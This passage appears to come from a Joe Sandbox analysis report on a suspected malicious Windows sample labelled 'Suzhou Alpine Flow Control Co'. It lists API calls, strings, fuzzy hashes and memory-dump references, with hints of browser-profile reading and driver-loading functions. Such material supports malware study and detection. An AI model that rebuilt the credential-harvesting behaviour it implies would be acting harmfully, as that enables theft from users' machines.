                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                    Strings
                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 829165378-0
                                                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                                                    • API String ID: 667068680-4123708296
                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                    • API String ID: 1607361635-601624466
                                                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1043902810-0
                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                    • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                    • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                    • API String ID: 3330709923-517860148
                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
